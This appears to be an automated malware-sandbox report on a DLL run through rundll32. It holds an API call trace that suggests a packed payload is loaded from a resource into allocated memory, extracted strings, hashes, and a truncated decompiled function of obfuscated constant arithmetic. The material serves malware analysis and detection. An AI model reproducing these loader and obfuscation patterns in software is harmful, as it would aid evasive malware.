ShowWindow.USER32(00000000,00000000), ref: 10003179
ShowWindow.USER32(00000000,00000000), ref: 1000317D
ShowWindow.USER32(00000000,00000000), ref: 10003181
ShowWindow.USER32(00000000,00000000), ref: 10003185
ShowWindow.USER32(00000000,00000000), ref: 10003189
ShowWindow.USER32(00000000,00000000), ref: 1000318D
ShowWindow.USER32(00000000,00000000), ref: 10003191
ShowWindow.USER32(00000000,00000000), ref: 10003195
ShowWindow.USER32(00000000,00000000), ref: 10003199
ShowWindow.USER32(00000000,00000000), ref: 1000319D
ShowWindow.USER32(00000000,00000000), ref: 100031A1
ShowWindow.USER32(00000000,00000000), ref: 100031A5
ShowWindow.USER32(00000000,00000000), ref: 100031A9
ShowWindow.USER32(00000000,00000000), ref: 100031AD
ShowWindow.USER32(00000000,00000000), ref: 100031B1
ShowWindow.USER32(00000000,00000000), ref: 100031B5
ShowWindow.USER32(00000000,00000000), ref: 100031B9
ShowWindow.USER32(00000000,00000000), ref: 100031BD
ShowWindow.USER32(00000000,00000000), ref: 100031C1
ShowWindow.USER32(00000000,00000000), ref: 100031C5
ShowWindow.USER32(00000000,00000000), ref: 100031C9
ShowWindow.USER32(00000000,00000000), ref: 100031CD
ShowWindow.USER32(00000000,00000000), ref: 100031D1
ShowWindow.USER32(00000000,00000000), ref: 100031D5
ShowWindow.USER32(00000000,00000000), ref: 100031D9
ShowWindow.USER32(00000000,00000000), ref: 100031DD
ShowWindow.USER32(00000000,00000000), ref: 100031E1
ShowWindow.USER32(00000000,00000000), ref: 100031E5
ShowWindow.USER32(00000000,00000000), ref: 100031E9
ShowWindow.USER32(00000000,00000000), ref: 100031ED
ShowWindow.USER32(00000000,00000000), ref: 100031F1
ShowWindow.USER32(00000000,00000000), ref: 100031F5
ShowWindow.USER32(00000000,00000000), ref: 100031F9
ShowWindow.USER32(00000000,00000000), ref: 100031FD
ShowWindow.USER32(00000000,00000000), ref: 10003201
ShowWindow.USER32(00000000,00000000), ref: 10003205
ShowWindow.USER32(00000000,00000000), ref: 10003209
ShowWindow.USER32(00000000,00000000), ref: 1000320D
ShowWindow.USER32(00000000,00000000), ref: 10003211
ShowWindow.USER32(00000000,00000000), ref: 10003215
ShowWindow.USER32(00000000,00000000), ref: 10003219
ShowWindow.USER32(00000000,00000000), ref: 1000321D
ShowWindow.USER32(00000000,00000000), ref: 10003221
ShowWindow.USER32(00000000,00000000), ref: 10003225
ShowWindow.USER32(00000000,00000000), ref: 10003229
ShowWindow.USER32(00000000,00000000), ref: 1000322D
ShowWindow.USER32(00000000,00000000), ref: 10003231
ShowWindow.USER32(00000000,00000000), ref: 10003235
ShowWindow.USER32(00000000,00000000), ref: 10003239
ShowWindow.USER32(00000000,00000000), ref: 1000323D
ShowWindow.USER32(00000000,00000000), ref: 10003241
ShowWindow.USER32(00000000,00000000), ref: 10003245
ShowWindow.USER32(00000000,00000000), ref: 10003249
ShowWindow.USER32(00000000,00000000), ref: 1000324D
ShowWindow.USER32(00000000,00000000), ref: 10003251
ShowWindow.USER32(00000000,00000000), ref: 10003255
ShowWindow.USER32(00000000,00000000), ref: 10003259
ShowWindow.USER32(00000000,00000000), ref: 1000325D
ShowWindow.USER32(00000000,00000000), ref: 10003261
ShowWindow.USER32(00000000,00000000), ref: 10003265
ShowWindow.USER32(00000000,00000000), ref: 10003269
ShowWindow.USER32(00000000,00000000), ref: 1000326D
ShowWindow.USER32(00000000,00000000), ref: 10003271
ShowWindow.USER32(00000000,00000000), ref: 10003275
ShowWindow.USER32(00000000,00000000), ref: 10003279
ShowWindow.USER32(00000000,00000000), ref: 1000327D
ShowWindow.USER32(00000000,00000000), ref: 10003281
ShowWindow.USER32(00000000,00000000), ref: 10003285
ShowWindow.USER32(00000000,00000000), ref: 10003289
ShowWindow.USER32(00000000,00000000), ref: 1000328D
ShowWindow.USER32(00000000,00000000), ref: 10003291
ShowWindow.USER32(00000000,00000000), ref: 10003295
ShowWindow.USER32(00000000,00000000), ref: 10003299
ShowWindow.USER32(00000000,00000000), ref: 1000329D
ShowWindow.USER32(00000000,00000000), ref: 100032A1
ShowWindow.USER32(00000000,00000000), ref: 100032A5
ShowWindow.USER32(00000000,00000000), ref: 100032A9
ShowWindow.USER32(00000000,00000000), ref: 100032AD
ShowWindow.USER32(00000000,00000000), ref: 100032B1
ShowWindow.USER32(00000000,00000000), ref: 100032B5
ShowWindow.USER32(00000000,00000000), ref: 100032B9
ShowWindow.USER32(00000000,00000000), ref: 100032BD
ShowWindow.USER32(00000000,00000000), ref: 100032C1
ShowWindow.USER32(00000000,00000000), ref: 100032C5
ShowWindow.USER32(00000000,00000000), ref: 100032C9
ShowWindow.USER32(00000000,00000000), ref: 100032CD
ShowWindow.USER32(00000000,00000000), ref: 100032D1
ShowWindow.USER32(00000000,00000000), ref: 100032D5
ShowWindow.USER32(00000000,00000000), ref: 100032D9
ShowWindow.USER32(00000000,00000000), ref: 100032DD
ShowWindow.USER32(00000000,00000000), ref: 100032E1
ShowWindow.USER32(00000000,00000000), ref: 100032E5
ShowWindow.USER32(00000000,00000000), ref: 100032E9
ShowWindow.USER32(00000000,00000000), ref: 100032ED
ShowWindow.USER32(00000000,00000000), ref: 100032F1
ShowWindow.USER32(00000000,00000000), ref: 100032F5
ShowWindow.USER32(00000000,00000000), ref: 100032F9
ShowWindow.USER32(00000000,00000000), ref: 100032FD
ShowWindow.USER32(00000000,00000000), ref: 10003301
ShowWindow.USER32(00000000,00000000), ref: 10003305
ShowWindow.USER32(00000000,00000000), ref: 10003309
ShowWindow.USER32(00000000,00000000), ref: 1000330D
ShowWindow.USER32(00000000,00000000), ref: 10003311
ShowWindow.USER32(00000000,00000000), ref: 10003315
ShowWindow.USER32(00000000,00000000), ref: 10003319
ShowWindow.USER32(00000000,00000000), ref: 1000331D
ShowWindow.USER32(00000000,00000000), ref: 10003321
ShowWindow.USER32(00000000,00000000), ref: 10003325
ShowWindow.USER32(00000000,00000000), ref: 10003329
ShowWindow.USER32(00000000,00000000), ref: 1000332D
ShowWindow.USER32(00000000,00000000), ref: 10003331
ShowWindow.USER32(00000000,00000000), ref: 10003335
ShowWindow.USER32(00000000,00000000), ref: 10003339
ShowWindow.USER32(00000000,00000000), ref: 1000333D
ShowWindow.USER32(00000000,00000000), ref: 10003341
ShowWindow.USER32(00000000,00000000), ref: 10003345
ShowWindow.USER32(00000000,00000000), ref: 10003349
ShowWindow.USER32(00000000,00000000), ref: 1000334D
ShowWindow.USER32(00000000,00000000), ref: 10003351
ShowWindow.USER32(00000000,00000000), ref: 10003355
ShowWindow.USER32(00000000,00000000), ref: 10003359
ShowWindow.USER32(00000000,00000000), ref: 1000335D
ShowWindow.USER32(00000000,00000000), ref: 10003361
ShowWindow.USER32(00000000,00000000), ref: 10003365
ShowWindow.USER32(00000000,00000000), ref: 10003369
ShowWindow.USER32(00000000,00000000), ref: 1000336D
ShowWindow.USER32(00000000,00000000), ref: 10003371
ShowWindow.USER32(00000000,00000000), ref: 10003375
ShowWindow.USER32(00000000,00000000), ref: 10003379
ShowWindow.USER32(00000000,00000000), ref: 1000337D
ShowWindow.USER32(00000000,00000000), ref: 10003381
ShowWindow.USER32(00000000,00000000), ref: 10003385
ShowWindow.USER32(00000000,00000000), ref: 10003389
ShowWindow.USER32(00000000,00000000), ref: 1000338D
ShowWindow.USER32(00000000,00000000), ref: 10003391
ShowWindow.USER32(00000000,00000000), ref: 10003395
ShowWindow.USER32(00000000,00000000), ref: 10003399
ShowWindow.USER32(00000000,00000000), ref: 1000339D
ShowWindow.USER32(00000000,00000000), ref: 100033A1
ShowWindow.USER32(00000000,00000000), ref: 100033A5
ShowWindow.USER32(00000000,00000000), ref: 100033A9
ShowWindow.USER32(00000000,00000000), ref: 100033AD
ShowWindow.USER32(00000000,00000000), ref: 100033B1
ShowWindow.USER32(00000000,00000000), ref: 100033B5
ShowWindow.USER32(00000000,00000000), ref: 100033B9
ShowWindow.USER32(00000000,00000000), ref: 100033BD
ShowWindow.USER32(00000000,00000000), ref: 100033C1
ShowWindow.USER32(00000000,00000000), ref: 100033C5
ShowWindow.USER32(00000000,00000000), ref: 100033C9
ShowWindow.USER32(00000000,00000000), ref: 100033CD
ShowWindow.USER32(00000000,00000000), ref: 100033D1
ShowWindow.USER32(00000000,00000000), ref: 100033D5
ShowWindow.USER32(00000000,00000000), ref: 100033D9
ShowWindow.USER32(00000000,00000000), ref: 100033DD
ShowWindow.USER32(00000000,00000000), ref: 100033E1
ShowWindow.USER32(00000000,00000000), ref: 100033E5
ShowWindow.USER32(00000000,00000000), ref: 100033E9
ShowWindow.USER32(00000000,00000000), ref: 100033ED
ShowWindow.USER32(00000000,00000000), ref: 100033F1
ShowWindow.USER32(00000000,00000000), ref: 100033F5
ShowWindow.USER32(00000000,00000000), ref: 100033F9
ShowWindow.USER32(00000000,00000000), ref: 100033FD
ShowWindow.USER32(00000000,00000000), ref: 10003401
ShowWindow.USER32(00000000,00000000), ref: 10003405
ShowWindow.USER32(00000000,00000000), ref: 10003409
ShowWindow.USER32(00000000,00000000), ref: 1000340D
ShowWindow.USER32(00000000,00000000), ref: 10003411
ShowWindow.USER32(00000000,00000000), ref: 10003415
ShowWindow.USER32(00000000,00000000), ref: 10003419
ShowWindow.USER32(00000000,00000000), ref: 1000341D
ShowWindow.USER32(00000000,00000000), ref: 10003421
ShowWindow.USER32(00000000,00000000), ref: 10003425
ShowWindow.USER32(00000000,00000000), ref: 10003429
ShowWindow.USER32(00000000,00000000), ref: 1000342D
ShowWindow.USER32(00000000,00000000), ref: 10003431
ShowWindow.USER32(00000000,00000000), ref: 10003435
ShowWindow.USER32(00000000,00000000), ref: 10003439
ShowWindow.USER32(00000000,00000000), ref: 1000343D
ShowWindow.USER32(00000000,00000000), ref: 10003441
ShowWindow.USER32(00000000,00000000), ref: 10003445
ShowWindow.USER32(00000000,00000000), ref: 10003449
ShowWindow.USER32(00000000,00000000), ref: 1000344D
ShowWindow.USER32(00000000,00000000), ref: 10003451
ShowWindow.USER32(00000000,00000000), ref: 10003455
ShowWindow.USER32(00000000,00000000), ref: 10003459
ShowWindow.USER32(00000000,00000000), ref: 1000345D
ShowWindow.USER32(00000000,00000000), ref: 10003461
ShowWindow.USER32(00000000,00000000), ref: 10003465
ShowWindow.USER32(00000000,00000000), ref: 10003469
ShowWindow.USER32(00000000,00000000), ref: 1000346D
ShowWindow.USER32(00000000,00000000), ref: 10003471
ShowWindow.USER32(00000000,00000000), ref: 10003475
ShowWindow.USER32(00000000,00000000), ref: 10003479
ShowWindow.USER32(00000000,00000000), ref: 1000347D
ShowWindow.USER32(00000000,00000000), ref: 10003481
ShowWindow.USER32(00000000,00000000), ref: 10003485
ShowWindow.USER32(00000000,00000000), ref: 10003489
ShowWindow.USER32(00000000,00000000), ref: 1000348D
ShowWindow.USER32(00000000,00000000), ref: 10003491
ShowWindow.USER32(00000000,00000000), ref: 10003495
ShowWindow.USER32(00000000,00000000), ref: 10003499
ShowWindow.USER32(00000000,00000000), ref: 1000349D
ShowWindow.USER32(00000000,00000000), ref: 100034A1
ShowWindow.USER32(00000000,00000000), ref: 100034A5
ShowWindow.USER32(00000000,00000000), ref: 100034A9
ShowWindow.USER32(00000000,00000000), ref: 100034AD
ShowWindow.USER32(00000000,00000000), ref: 100034B1
ShowWindow.USER32(00000000,00000000), ref: 100034B5
ShowWindow.USER32(00000000,00000000), ref: 100034B9
ShowWindow.USER32(00000000,00000000), ref: 100034BD
ShowWindow.USER32(00000000,00000000), ref: 100034C1
ShowWindow.USER32(00000000,00000000), ref: 100034C5
ShowWindow.USER32(00000000,00000000), ref: 100034C9
ShowWindow.USER32(00000000,00000000), ref: 100034CD
ShowWindow.USER32(00000000,00000000), ref: 100034D1
ShowWindow.USER32(00000000,00000000), ref: 100034D5
ShowWindow.USER32(00000000,00000000), ref: 100034D9
ShowWindow.USER32(00000000,00000000), ref: 100034DD
ShowWindow.USER32(00000000,00000000), ref: 100034E1
ShowWindow.USER32(00000000,00000000), ref: 100034E5
ShowWindow.USER32(00000000,00000000), ref: 100034E9
ShowWindow.USER32(00000000,00000000), ref: 100034ED
ShowWindow.USER32(00000000,00000000), ref: 100034F1
ShowWindow.USER32(00000000,00000000), ref: 100034F5
ShowWindow.USER32(00000000,00000000), ref: 100034F9
ShowWindow.USER32(00000000,00000000), ref: 100034FD
ShowWindow.USER32(00000000,00000000), ref: 10003501
ShowWindow.USER32(00000000,00000000), ref: 10003505
ShowWindow.USER32(00000000,00000000), ref: 10003509
ShowWindow.USER32(00000000,00000000), ref: 1000350D
ShowWindow.USER32(00000000,00000000), ref: 10003511
ShowWindow.USER32(00000000,00000000), ref: 10003515
ShowWindow.USER32(00000000,00000000), ref: 10003519
ShowWindow.USER32(00000000,00000000), ref: 1000351D
ShowWindow.USER32(00000000,00000000), ref: 10003521
ShowWindow.USER32(00000000,00000000), ref: 10003525
ShowWindow.USER32(00000000,00000000), ref: 10003529
ShowWindow.USER32(00000000,00000000), ref: 1000352D
ShowWindow.USER32(00000000,00000000), ref: 10003531
ShowWindow.USER32(00000000,00000000), ref: 10003535
ShowWindow.USER32(00000000,00000000), ref: 10003539
ShowWindow.USER32(00000000,00000000), ref: 1000353D
ShowWindow.USER32(00000000,00000000), ref: 10003541
ShowWindow.USER32(00000000,00000000), ref: 10003545
ShowWindow.USER32(00000000,00000000), ref: 10003549
ShowWindow.USER32(00000000,00000000), ref: 1000354D
ShowWindow.USER32(00000000,00000000), ref: 10003551
ShowWindow.USER32(00000000,00000000), ref: 10003555
ShowWindow.USER32(00000000,00000000), ref: 10003559
ShowWindow.USER32(00000000,00000000), ref: 1000355D
ShowWindow.USER32(00000000,00000000), ref: 10003561
ShowWindow.USER32(00000000,00000000), ref: 10003565
ShowWindow.USER32(00000000,00000000), ref: 10003569
ShowWindow.USER32(00000000,00000000), ref: 1000356D
ShowWindow.USER32(00000000,00000000), ref: 10003571
ShowWindow.USER32(00000000,00000000), ref: 10003575
ShowWindow.USER32(00000000,00000000), ref: 10003579
ShowWindow.USER32(00000000,00000000), ref: 1000357D
ShowWindow.USER32(00000000,00000000), ref: 10003581
ShowWindow.USER32(00000000,00000000), ref: 10003585
ShowWindow.USER32(00000000,00000000), ref: 10003589
ShowWindow.USER32(00000000,00000000), ref: 1000358D
ShowWindow.USER32(00000000,00000000), ref: 10003591
ShowWindow.USER32(00000000,00000000), ref: 10003595
ShowWindow.USER32(00000000,00000000), ref: 10003599
ShowWindow.USER32(00000000,00000000), ref: 1000359D
ShowWindow.USER32(00000000,00000000), ref: 100035A1
ShowWindow.USER32(00000000,00000000), ref: 100035A5
ShowWindow.USER32(00000000,00000000), ref: 100035A9
ShowWindow.USER32(00000000,00000000), ref: 100035AD
ShowWindow.USER32(00000000,00000000), ref: 100035B1
ShowWindow.USER32(00000000,00000000), ref: 100035B5
ShowWindow.USER32(00000000,00000000), ref: 100035B9
ShowWindow.USER32(00000000,00000000), ref: 100035BD
ShowWindow.USER32(00000000,00000000), ref: 100035C1
ShowWindow.USER32(00000000,00000000), ref: 100035C5
ShowWindow.USER32(00000000,00000000), ref: 100035C9
ShowWindow.USER32(00000000,00000000), ref: 100035CD
ShowWindow.USER32(00000000,00000000), ref: 100035D1
ShowWindow.USER32(00000000,00000000), ref: 100035D5
ShowWindow.USER32(00000000,00000000), ref: 100035D9
ShowWindow.USER32(00000000,00000000), ref: 100035DD
ShowWindow.USER32(00000000,00000000), ref: 100035E1
ShowWindow.USER32(00000000,00000000), ref: 100035E5
ShowWindow.USER32(00000000,00000000), ref: 100035E9
ShowWindow.USER32(00000000,00000000), ref: 100035ED
ShowWindow.USER32(00000000,00000000), ref: 100035F1
ShowWindow.USER32(00000000,00000000), ref: 100035F5
ShowWindow.USER32(00000000,00000000), ref: 100035F9
ShowWindow.USER32(00000000,00000000), ref: 100035FD
ShowWindow.USER32(00000000,00000000), ref: 10003601
ShowWindow.USER32(00000000,00000000), ref: 10003605
ShowWindow.USER32(00000000,00000000), ref: 10003609
ShowWindow.USER32(00000000,00000000), ref: 1000360D
ShowWindow.USER32(00000000,00000000), ref: 10003611
ShowWindow.USER32(00000000,00000000), ref: 10003615
ShowWindow.USER32(00000000,00000000), ref: 10003619
ShowWindow.USER32(00000000,00000000), ref: 1000361D
ShowWindow.USER32(00000000,00000000), ref: 10003621
ShowWindow.USER32(00000000,00000000), ref: 10003625
ShowWindow.USER32(00000000,00000000), ref: 10003629
ShowWindow.USER32(00000000,00000000), ref: 1000362D
ShowWindow.USER32(00000000,00000000), ref: 10003631
ShowWindow.USER32(00000000,00000000), ref: 10003635
ShowWindow.USER32(00000000,00000000), ref: 10003639
ShowWindow.USER32(00000000,00000000), ref: 1000363D
ShowWindow.USER32(00000000,00000000), ref: 10003641
ShowWindow.USER32(00000000,00000000), ref: 10003645
ShowWindow.USER32(00000000,00000000), ref: 10003649
ShowWindow.USER32(00000000,00000000), ref: 1000364D
ShowWindow.USER32(00000000,00000000), ref: 10003651
ShowWindow.USER32(00000000,00000000), ref: 10003655
ShowWindow.USER32(00000000,00000000), ref: 10003659
ShowWindow.USER32(00000000,00000000), ref: 1000365D
ShowWindow.USER32(00000000,00000000), ref: 10003661
ShowWindow.USER32(00000000,00000000), ref: 10003665
ShowWindow.USER32(00000000,00000000), ref: 10003669
ShowWindow.USER32(00000000,00000000), ref: 1000366D
ShowWindow.USER32(00000000,00000000), ref: 10003671
ShowWindow.USER32(00000000,00000000), ref: 10003675
ShowWindow.USER32(00000000,00000000), ref: 10003679
ShowWindow.USER32(00000000,00000000), ref: 1000367D
ShowWindow.USER32(00000000,00000000), ref: 10003681
ShowWindow.USER32(00000000,00000000), ref: 10003685
ShowWindow.USER32(00000000,00000000), ref: 10003689
ShowWindow.USER32(00000000,00000000), ref: 1000368D
ShowWindow.USER32(00000000,00000000), ref: 10003691
ShowWindow.USER32(00000000,00000000), ref: 10003695
ShowWindow.USER32(00000000,00000000), ref: 10003699
ShowWindow.USER32(00000000,00000000), ref: 1000369D
ShowWindow.USER32(00000000,00000000), ref: 100036A1
ShowWindow.USER32(00000000,00000000), ref: 100036A5
ShowWindow.USER32(00000000,00000000), ref: 100036A9
ShowWindow.USER32(00000000,00000000), ref: 100036AD
ShowWindow.USER32(00000000,00000000), ref: 100036B1
ShowWindow.USER32(00000000,00000000), ref: 100036B5
ShowWindow.USER32(00000000,00000000), ref: 100036B9
ShowWindow.USER32(00000000,00000000), ref: 100036BD
ShowWindow.USER32(00000000,00000000), ref: 100036C1
ShowWindow.USER32(00000000,00000000), ref: 100036C5
ShowWindow.USER32(00000000,00000000), ref: 100036C9
ShowWindow.USER32(00000000,00000000), ref: 100036CD
ShowWindow.USER32(00000000,00000000), ref: 100036D1
ShowWindow.USER32(00000000,00000000), ref: 100036D5
ShowWindow.USER32(00000000,00000000), ref: 100036D9
ShowWindow.USER32(00000000,00000000), ref: 100036DD
ShowWindow.USER32(00000000,00000000), ref: 100036E1
ShowWindow.USER32(00000000,00000000), ref: 100036E5
ShowWindow.USER32(00000000,00000000), ref: 100036E9
ShowWindow.USER32(00000000,00000000), ref: 100036ED
ShowWindow.USER32(00000000,00000000), ref: 100036F1
ShowWindow.USER32(00000000,00000000), ref: 100036F5
ShowWindow.USER32(00000000,00000000), ref: 100036F9
ShowWindow.USER32(00000000,00000000), ref: 100036FD
ShowWindow.USER32(00000000,00000000), ref: 10003701
ShowWindow.USER32(00000000,00000000), ref: 10003705
ShowWindow.USER32(00000000,00000000), ref: 10003709
ShowWindow.USER32(00000000,00000000), ref: 1000370D
ShowWindow.USER32(00000000,00000000), ref: 10003711
ShowWindow.USER32(00000000,00000000), ref: 10003715
ShowWindow.USER32(00000000,00000000), ref: 10003719
ShowWindow.USER32(00000000,00000000), ref: 1000371D
ShowWindow.USER32(00000000,00000000), ref: 10003721
ShowWindow.USER32(00000000,00000000), ref: 10003725
ShowWindow.USER32(00000000,00000000), ref: 10003729
ShowWindow.USER32(00000000,00000000), ref: 1000372D
ShowWindow.USER32(00000000,00000000), ref: 10003731
ShowWindow.USER32(00000000,00000000), ref: 10003735
ShowWindow.USER32(00000000,00000000), ref: 10003739
ShowWindow.USER32(00000000,00000000), ref: 1000373D
ShowWindow.USER32(00000000,00000000), ref: 10003741
ShowWindow.USER32(00000000,00000000), ref: 10003745
ShowWindow.USER32(00000000,00000000), ref: 10003749
ShowWindow.USER32(00000000,00000000), ref: 1000374D
ShowWindow.USER32(00000000,00000000), ref: 10003751
ShowWindow.USER32(00000000,00000000), ref: 10003755
ShowWindow.USER32(00000000,00000000), ref: 10003759
ShowWindow.USER32(00000000,00000000), ref: 1000375D
ShowWindow.USER32(00000000,00000000), ref: 10003761
ShowWindow.USER32(00000000,00000000), ref: 10003765
ShowWindow.USER32(00000000,00000000), ref: 10003769
ShowWindow.USER32(00000000,00000000), ref: 1000376D
ShowWindow.USER32(00000000,00000000), ref: 10003771
ShowWindow.USER32(00000000,00000000), ref: 10003775
ShowWindow.USER32(00000000,00000000), ref: 10003779
ShowWindow.USER32(00000000,00000000), ref: 1000377D
ShowWindow.USER32(00000000,00000000), ref: 10003781
ShowWindow.USER32(00000000,00000000), ref: 10003785
ShowWindow.USER32(00000000,00000000), ref: 10003789
ShowWindow.USER32(00000000,00000000), ref: 1000378D
ShowWindow.USER32(00000000,00000000), ref: 10003791
ShowWindow.USER32(00000000,00000000), ref: 10003795
ShowWindow.USER32(00000000,00000000), ref: 10003799
ShowWindow.USER32(00000000,00000000), ref: 1000379D
ShowWindow.USER32(00000000,00000000), ref: 100037A1
ShowWindow.USER32(00000000,00000000), ref: 100037A5
ShowWindow.USER32(00000000,00000000), ref: 100037A9
ShowWindow.USER32(00000000,00000000), ref: 100037AD
ShowWindow.USER32(00000000,00000000), ref: 100037B1
ShowWindow.USER32(00000000,00000000), ref: 100037B5
ShowWindow.USER32(00000000,00000000), ref: 100037B9
ShowWindow.USER32(00000000,00000000), ref: 100037BD
GetProcAddress.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,LdrF,00000004), ref: 100037ED
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003811
LdrFindResource_U.NTDLL(10000000,?,00000003,?), ref: 10003829
LdrAccessResource.NTDLL(10000000,?,?,?), ref: 10003847
WriteFileGather.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,LdrF,00000004), ref: 10003852
VirtualAlloc.KERNELBASE(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,LdrF), ref: 10003A18

Part of subcall function 10001140: _malloc.LIBCMT ref: 10001145

Part of subcall function 10004380: SetLastError.KERNEL32(0000007F,10003A72,00000000,RunDLL,00000000,?), ref: 10004398

MessageBoxA.USER32 ref: 10003A7E

Strings

sResource, xrefs: 100024F1
RunDLL, xrefs: 10003A63
Acces, xrefs: 100024C9
Hli2W6g#M?#d!+j%)Q&u3drUUqwMWYP8$x^%7L?4x7az_27aeNid!*9Qfq5e7>X5^o7BO?wNv0y$9V$UB0EbW, xrefs: 10003A37
ntdll.dll, xrefs: 10002565
ce_U, xrefs: 100025E8
Ldr, xrefs: 10002481
LdrF, xrefs: 10002572
Resour, xrefs: 100025C0
ind, xrefs: 1000259E

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: ShowWindow$AddressProc$AccessAllocErrorFileFindGatherLastLibraryLoadMessageResourceResource_String_base::_VirtualWriteXlen_malloc_memcpy_sstd::_
String ID: Acces$Hli2W6g#M?#d!+j%)Q&u3drUUqwMWYP8$x^%7L?4x7az_27aeNid!*9Qfq5e7>X5^o7BO?wNv0y$9V$UB0EbW$Ldr$LdrF$Resour$RunDLL$ce_U$ind$ntdll.dll$sResource
API String ID: 894442030-2234130242
Opcode ID: a055f8a59f591c1a126e1992df87313740c9fb811753e7d85fd8bf6d4646acb8
Instruction ID: 2e66c7299424e9bc3e7c96d2ccb5f08d2b6936b7594c4cb43d1b73e226504e78
Opcode Fuzzy Hash: a055f8a59f591c1a126e1992df87313740c9fb811753e7d85fd8bf6d4646acb8
Instruction Fuzzy Hash: 40F275E1C0436C7EF131AB764CC9EAF6E9CDE446E8B406D1AB18E451069E39DD44CEB2

Uniqueness

Uniqueness Score: -1.00%

Function 00299716, Relevance: 38.5, Strings: 30, Instructions: 1038
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E00299716() {
				char _v68;
				signed int _v72;
				signed int _v80;
				signed int _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				char _v112;
				signed int _v116;
				char _v124;
				signed int _v132;
				char _v140;
				char _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				unsigned int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				unsigned int _v260;
				signed int _v264;
				signed int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				unsigned int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				unsigned int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				unsigned int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				unsigned int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t1010;
				void* _t1019;
				signed int _t1020;
				void* _t1033;
				void* _t1067;
				void* _t1091;
				signed int _t1093;
				signed int _t1094;
				signed int _t1117;
				signed int _t1188;
				signed int _t1192;
				signed int _t1193;
				signed int _t1199;
				signed int _t1200;
				signed int _t1201;
				signed int _t1202;
				signed int _t1203;
				signed int _t1204;
				signed int _t1205;
				signed int _t1206;
				signed int _t1207;
				signed int _t1208;
				signed int _t1209;
				signed int _t1210;
				signed int _t1211;
				signed int _t1212;
				signed int _t1213;
				signed int _t1214;
				signed int _t1215;
				signed int _t1216;
				signed int _t1223;
				signed int _t1225;
				void* _t1227;
				void* _t1229;
				void* _t1235;
				void* _t1236;
				void* _t1237;

				_t1227 = (_t1225 & 0xfffffff8) - 0x230;
				_v552 = 0xa611;
				_v552 = _v552 >> 6;
				_t1096 = 0x3753589a;
				_v552 = _v552 + 0xffffbbab;
				_v552 = _v552 + 0xb82;
				_v552 = _v552 ^ 0xffffb62d;
				_v408 = 0xd63c;
				_v408 = _v408 | 0x2d30ecd1;
				_v408 = _v408 + 0x4a88;
				_v408 = _v408 ^ 0x2d310fb6;
				_v288 = 0xfcef;
				_v288 = _v288 + 0xb91e;
				_v288 = _v288 << 6;
				_v288 = _v288 ^ 0x006dfdf3;
				_v352 = 0xd11e;
				_v352 = _v352 << 0x10;
				_v352 = _v352 ^ 0xd187f0d8;
				_v352 = _v352 ^ 0x0099c431;
				_v344 = 0xb957;
				_t1199 = 0x3a;
				_v344 = _v344 / _t1199;
				_v344 = _v344 * 0x4d;
				_v344 = _v344 ^ 0x0000cd31;
				_v372 = 0x9432;
				_v372 = _v372 | 0xc1dd440c;
				_v372 = _v372 ^ 0xbde3bf42;
				_v372 = _v372 ^ 0x7c3e45cb;
				_v300 = 0x8992;
				_v300 = _v300 | 0xaa197510;
				_v300 = _v300 >> 3;
				_v300 = _v300 ^ 0x15434bfd;
				_v332 = 0xe27;
				_v332 = _v332 << 0xb;
				_v332 = _v332 ^ 0x2fdb4e06;
				_v332 = _v332 ^ 0x2faa6389;
				_v528 = 0x43bc;
				_v528 = _v528 ^ 0x6d5b72a2;
				_v528 = _v528 << 7;
				_v528 = _v528 + 0xe990;
				_v528 = _v528 ^ 0xad993815;
				_v292 = 0xc4da;
				_v292 = _v292 * 0x2a;
				_v292 = _v292 + 0xffff6485;
				_v292 = _v292 ^ 0x001f8496;
				_v240 = 0xe975;
				_v240 = _v240 * 0x3b;
				_v240 = _v240 ^ 0x0035a032;
				_v284 = 0x8dde;
				_v284 = _v284 * 0x6a;
				_v284 = _v284 << 0xb;
